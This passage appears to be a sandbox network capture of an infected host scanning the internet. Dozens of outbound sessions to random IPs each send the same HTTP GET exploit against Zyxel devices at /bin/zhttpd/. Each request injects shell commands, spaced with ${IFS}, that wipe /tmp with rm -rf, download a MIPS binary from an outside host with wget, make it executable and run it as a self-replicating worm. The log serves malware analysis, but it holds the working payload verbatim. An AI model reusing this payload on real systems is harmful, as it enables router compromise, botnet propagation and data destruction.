                              Mar 31, 2024 08:42:21.530512094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9482192.168.2.1358962131.208.206.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530569077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9483192.168.2.133510866.65.42.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530615091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9484192.168.2.1349860148.113.45.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530654907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9485192.168.2.134119825.29.56.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530687094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9486192.168.2.1359366171.235.220.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530741930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9487192.168.2.1341912138.214.202.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530762911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9488192.168.2.135695275.197.227.175443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530796051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9489192.168.2.1352812163.21.10.73443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530847073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9490192.168.2.1358498195.129.247.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530895948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9491192.168.2.1350506189.218.191.214443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530952930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9492192.168.2.1354374126.137.24.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.530989885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9493192.168.2.1354078108.113.36.145443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531014919 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9494192.168.2.1346428101.222.113.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531084061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9495192.168.2.1346476207.241.221.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531145096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9496192.168.2.135556645.93.91.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531167984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9497192.168.2.1345926146.100.94.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531234026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9498192.168.2.134401459.101.216.55443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531256914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9499192.168.2.135165264.30.103.203443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531313896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9500192.168.2.1355248145.205.105.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531353951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9501192.168.2.1351670220.223.109.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531388998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9502192.168.2.13570744.247.47.184443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531440020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9503192.168.2.134106036.170.249.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531474113 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9504192.168.2.135872437.17.118.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531542063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9505192.168.2.1354144172.201.29.192443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531583071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9506192.168.2.1339808187.120.241.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531639099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9507192.168.2.1356376131.128.89.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531651020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9508192.168.2.1359304120.160.72.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531699896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9509192.168.2.135869664.30.115.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531730890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9510192.168.2.1339460133.191.238.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531783104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9511192.168.2.1349694206.220.183.19443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531816006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9512192.168.2.1354626185.121.94.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531848907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9513192.168.2.1333672155.152.80.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531886101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9514192.168.2.135715295.227.102.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531936884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9515192.168.2.13422762.145.239.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.531976938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9516192.168.2.133969438.239.67.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532031059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9517192.168.2.1350208161.138.32.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532054901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9518192.168.2.133749876.88.139.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532128096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9519192.168.2.134491286.233.208.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532154083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9520192.168.2.13566409.130.154.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532212019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9521192.168.2.1346924143.176.228.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532259941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9522192.168.2.133278261.69.82.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532295942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9523192.168.2.135654876.146.219.32443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532361984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9524192.168.2.134337814.83.16.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532401085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9525192.168.2.134583899.66.240.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532444000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9526192.168.2.135914290.124.190.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532493114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9527192.168.2.136000276.241.242.158443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532527924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9528192.168.2.1355762137.86.197.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532569885 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9529192.168.2.1333244200.53.168.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532610893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9530192.168.2.135650454.84.136.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532665014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9531192.168.2.1337244192.139.4.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532696962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9532192.168.2.1343772155.130.228.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532742023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9533192.168.2.135122635.16.162.156443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532764912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9534192.168.2.1347326138.21.213.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532824039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9535192.168.2.1340334198.73.200.172443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532824039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9536192.168.2.135311083.137.82.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532865047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9537192.168.2.1355690155.109.246.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532907009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9538192.168.2.13582589.196.172.221443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.532951117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9539192.168.2.1337438152.78.32.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533000946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9540192.168.2.134375248.74.228.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533061028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9541192.168.2.135331696.117.94.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533091068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9542192.168.2.135657845.229.185.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533133030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9543192.168.2.1352504210.242.91.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533181906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9544192.168.2.1357620209.129.106.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533252954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9545192.168.2.1356738148.33.141.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533272028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9546192.168.2.1351128106.162.57.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533330917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9547192.168.2.1335868100.150.91.48443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533368111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9548192.168.2.1355816192.40.154.210443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533412933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9549192.168.2.1347072207.170.149.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.533459902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9550192.168.2.135129675.252.168.27443
                              TimestampBytes transferredDirectionData
